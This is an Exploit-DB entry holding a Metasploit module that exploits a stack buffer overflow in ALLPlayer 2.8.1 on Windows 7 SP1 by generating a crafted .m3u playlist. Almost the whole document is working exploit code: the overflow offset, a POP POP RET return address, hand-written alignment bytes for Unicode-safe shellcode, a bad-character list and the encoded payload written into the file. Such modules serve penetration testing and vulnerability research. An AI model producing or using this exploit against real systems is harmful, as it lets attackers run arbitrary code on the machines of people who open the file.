ALLPlayer - '.m3u' Local Buffer Overflow (Metasploit)

EDB-ID:

32074


Author:

Metasploit

Type:

local


Platform:

Windows

Date:

2014-03-05


##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ALLPlayer M3U Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability in
        ALLPlayer 2.8.1, caused by a long string in a playlist entry.
        By persuading the victim to open a specially-crafted .M3U file, a
        remote attacker could execute arbitrary code on the system or cause
        the application to crash. This module has been tested successfully on
        Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom',      # Vulnerability discovery
          'Mike Czumak',  # Original exploit
          'Gabor Seljan'  # Metasploit module
        ],
      'References'     =>
        [
          [ 'BID', '62926' ],
          [ 'BID', '63896' ],
          [ 'EDB', '28855' ],
          [ 'EDB', '29549' ],
          [ 'EDB', '29798' ],
          [ 'EDB', '32041' ],
          [ 'OSVDB', '98283' ],
          [ 'URL', 'http://www.allplayer.org/' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'DisableNops'    => true,
          'BadChars'       => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",
          'Space'          => 3060,
          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'EAX'
            }
        },
      'Targets'        =>
        [
          [ ' ALLPlayer 2.8.1 / Windows 7 SP1',
            {
              'Offset' => 301,
              'Ret'    => "\x50\x45",  # POP POP RET from ALLPlayer.exe
              'Nop'    => "\x6e"       # ADD BYTE PTR DS:[ESI],CH
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Oct 09 2013',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])
        ],
      self.class)

  end


  def exploit
    nop = target['Nop']

    sploit =  rand_text_alpha_upper(target['Offset'])
    sploit << "\x61\x50"      # POPAD
    sploit << target.ret
    sploit << "\x53"          # PUSH EBX
    sploit << nop
    sploit << "\x58"          # POP EAX
    sploit << nop
    sploit << "\x05\x14\x11"  # ADD EAX,0x11001400
    sploit << nop
    sploit << "\x2d\x13\x11"  # SUB EAX,0x11001300
    sploit << nop
    sploit << "\x50"          # PUSH EAX
    sploit << nop
    sploit << "\xc3"          # RET
    sploit << nop * 109
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(10000) # Generate exception

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create("http://" + sploit)

  end
end